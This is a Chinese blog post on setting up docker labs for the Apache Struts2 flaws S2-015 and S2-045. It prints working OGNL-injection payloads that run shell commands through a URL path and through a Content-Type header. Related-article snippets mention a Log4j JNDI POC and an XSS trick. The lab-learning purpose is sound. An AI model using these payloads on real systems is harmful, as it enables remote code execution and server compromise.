Str2 漏洞 搭建 简单学习

最新推荐文章于 2024-12-19 00:59:40 发布
最新推荐文章于 2024-12-19 00:59:40 发布
阅读量841 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Str2命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38063791/article/details/84140248
本文介绍了Struts2的几个重要漏洞,包括S2-015、S2-045和S2-046。针对每个漏洞,提供了官方链接以及受影响的版本范围。特别提到,S2-015可以通过执行Message触发,修复措施是尽快将Struts2更新到最新版本以避免风险。对于Str-048,文章表明分析尚未完成。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

struts2_s2-015

官方:https://cwiki.apache.org/confluence/display/WW/S2-015

1感谢大佬的项目:https://github.com/Medicean/VulApps/tree/master/s/struts2/

1拉取景象
docker pull medicean/vulapps:s_struts2_s2-015

1运行
docker run -dt(后台运行) --name sqli-labs (名字) -p 80:80 (本地,docker端口 映射) --rm (docker 停止后 ,删除产生所有的镜像) 
docker run -dt --name struts_s2-015 -p 80:8080 --rm  medicean/vulapps:s_struts2_s2-015

在这里插入图片描述

POC:
/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action
改变 exec中即可

在这里插入图片描述
Message 执行了

struts2-045

1拉取景象
docker pull medicean/vulapps:s_struts2_s2-045

1运行
docker run -dt(后台运行) --name sqli-labs (名字) -p 80:80 (本地,docker端口 映射) --rm (docker 停止后 ,删除产生所有的镜像) 
docker run -dt --name struts_s2-045 -p 80:8080 --rm  medicean/vulapps:s_struts2_s2-045

在这里插入图片描述

POC1:
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

最低0.47元/天 解锁文章

200万优质内容无限畅学
【C++实战篇】str1、str2连接,分别用定长存储、堆存储、块链存储实现
程序员,他们想的是什么?他们想的永远都是技术,他们崇尚的也永远都是技术。
06-09 1446
串连接三种方式实现(定长、堆、块链)1 定长存储2 堆分配存储3 块链存储思路(1):两个子串先分成块,再连接思路(2)先连接,再分块存储 字符串str1、str2连接,分别用定长存储、堆分配存储、块链存储实现,不能直接调用函数库中自带的连接函数。 1 定长存储 #include<iostream> using namespace std; #define MAXLEN 255//定义串的最大长度为255,<=255以内的任何串可用 typedef struct { char ch[MA
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 3104
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
漏洞靶场搭建
nejore的博客
06-08 1033
vulhub基础环境搭建
【Python】STR2漏洞综合扫描+源码分析
浪子燕青的博客
01-18 3260
花了半天写完的~~ 还不错~~ 现在同目录下创建url.txt  将收集到的url放进去  就ok~~ 最后成功的会在同目录下生产success.txt~~ 附上源码~~~ # -*-coding:utf-8-*- import requests import time print unicode(''' 作者:浪子燕青 作者QQ:982722261
【渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 1万+
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
str2
iteye_20820的博客
12-13 218
标签: 1. addFieldError("name","this is name"); 带格式 2. 3. 取值栈中的值 取actionStatct中的值 参数没有用action参数接收的,可以在#parameters.r1的方式取出 获取web元素: ...
【安全漏洞Struts2漏洞集合总结
HBohan的博客
01-24 3480
总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署。
服务器解析漏洞与cms靶场搭建教程
wutiangui的博客
07-01 2261
解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web服务器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞Apache(2.4.0~2.4.29)解析漏洞 CVE-2017-15715测试方法:test.php. 抓包修改.为test.php%0aApache AddHandler解析漏洞:从右到左识别httd.conf开启:AddHandler application/x-httpd-php .phpIIS6 解析漏洞:*.asp;.jpg作为asp解析。
安全漏洞之Log4j2漏洞复现绕过分析
热门推荐
kali_Ma的博客
12-12 2万+
0x00 介绍 Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告 分配CVE编号:CVE-2021-44228 CVSS评分:10.0(最高只能10分) POC比较简单 public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}"); } POC虽然简单,但是搭建LDAP环境显得有点复杂,m
【CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)
brhhh_sehe的博客
12-19 1138
用户在输入框中输入图片地址存储到str变量中 然后在xss()函数里面给id为demo的标签设置内容(innerHTML) 内容是加载图片,所以我们输入时放一个无法加载的图片,然后触发onerror事件,在这个事件里面可以触发弹窗,注意构造payload的时候一定要把img标签进行闭合。自己语言的转义:我认为就是在该网站中,比如说存在留言功能,然后攻击者留言了一段恶意代码,这段留言是别的用户也可以访问到的,在其他用户查看这段留言的时候服务器进行解析,导致执行一些危险行为,这个整段过程就是跨站脚本攻击。
Struts2漏洞
2403_82795493的博客
02-20 4081
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
java struts2 漏洞复现合集
whatday的专栏
08-31 8281
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
漏洞练习环境搭建笔记
qq_32812063的博客
11-21 1185
漏洞环境
"Str2$"变量未定义(学生信息管理系统问题之一)
sunny_LI
08-04 2091
 问题:Str2$变量未定义。   我的解决办法:(试了一下不行,定义都有问题)     dim str2$ as Boolean     str2$ = MsgBox("是否删除当前记录?", vbOKCancel, "删除当前记录")         If str2$ = vbOK Then     网上的解决办法:   1. Dim str2$ A
nuPlan又一SOTA!赵行团队新作STR2:运动规划的重新出发,仿真闭环的强大泛化!...
CV_Autobot的博客
11-06 955
点击下方卡片,关注“自动驾驶之心”公众号戳我->领取自动驾驶近15个方向学习路线今天自动驾驶之心为大家分享上海期智研究院等团队的最新工作—STR2!运动规划新方案,直接SOTA!如果您有相关工作需要分享,请在文末联系我们!自动驾驶课程学习与技术交流群事宜,也欢迎添加小助理微信AIDriver004做进一步咨询>>点击进入→自动驾驶之心『运动规划』技术交流群论文作者| Qiao...
判断字符串str2是否整体包含在字符串str1中
m0_73497041的博客
05-12 1490
C语言作业
字符串函数-C语言基础知识入门
qq_61638928的博客
10-03 1015
几个字符串函数
str1中删除str2中包含的字符
jiexuelc blog
10-22 4028
str1中删除str2中包含的字符 例如: char str1[] = “Abc*defghicc”; char str2[] = “Ac*ic”; 处理结果为:str1[] = “bdefghc” #include&lt;stdio.h&gt; void delete_char(char* str1, char* str2) { char *head = str1; //...
Django注入漏洞环境搭建
最新发布
03-08
出于教育目的,在受控环境中构建具有已知漏洞的应用程序可以帮助理解其工作原理并学习防御措施。下面介绍如何设置一个存在特定SQL注入漏洞的Django应用程序。 #### 安装依赖项 确保安装了Python以及pip工具之后,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值